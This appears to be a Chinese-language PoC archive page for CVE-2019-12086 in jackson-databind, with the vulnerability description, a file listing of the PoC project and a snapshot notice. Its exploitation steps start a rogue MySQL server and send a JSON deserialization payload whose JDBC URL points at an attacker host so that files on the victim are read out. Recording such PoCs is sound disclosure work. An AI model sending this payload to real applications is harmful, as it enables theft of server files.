关联漏洞
标题:FasterXML jackson-databind 代码问题漏洞 (CVE-2019-12086)Description:FasterXML jackson-databind是一个基于JAVA可以将XML和JSON等数据格式与JAVA对象进行转换的库。Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象。 FasterXML jackson-databind 2.9.9之前的2.x版本中存在代码问题漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
Description
jackson unserialize
介绍
# 文档说明
CVE-2019-12086
jackson unserialize
# 漏洞利用
1、启动恶意MySQL服务器:
`python rogue_mysql_server.py`
2、在同一个目录下查看mysql.log:
`tail -f mysql.log`
3、向存在漏洞的应用发送如下json:
`["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]`
当jackson反序列化恶意json串后,会连接恶意MySQL服务器,被读取的文件内容会写入恶意服务器的mysql.log
文件快照
[4.0K] /data/pocs/5e3d5821246a644f7a16828ac72aadb8d1cc00f4
├── [4.0K] JacksonTest
│ ├── [ 81] JacksonTest.iml
│ ├── [3.9K] pom.xml
│ ├── [4.0K] src
│ │ ├── [4.0K] main
│ │ │ └── [4.0K] java
│ │ │ └── [4.0K] com
│ │ │ └── [4.0K] jacksonTest
│ │ │ ├── [ 191] App.java
│ │ │ └── [ 617] Poc.java
│ │ └── [4.0K] test
│ │ └── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] jacksonTest
│ │ └── [ 307] AppTest.java
│ └── [4.0K] target
│ ├── [4.0K] classes
│ │ └── [4.0K] com
│ │ └── [4.0K] jacksonTest
│ │ ├── [ 545] App.class
│ │ └── [1.2K] Poc.class
│ └── [4.0K] test-classes
│ └── [4.0K] com
│ └── [4.0K] jacksonTest
│ └── [ 477] AppTest.class
├── [ 466] README.md
└── [4.0K] Rogue-MySql-Server-master
├── [1.3K] LICENSE
├── [ 215] README.md
├── [1.5K] roguemysql.php
└── [7.3K] rogue_mysql_server.py
18 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。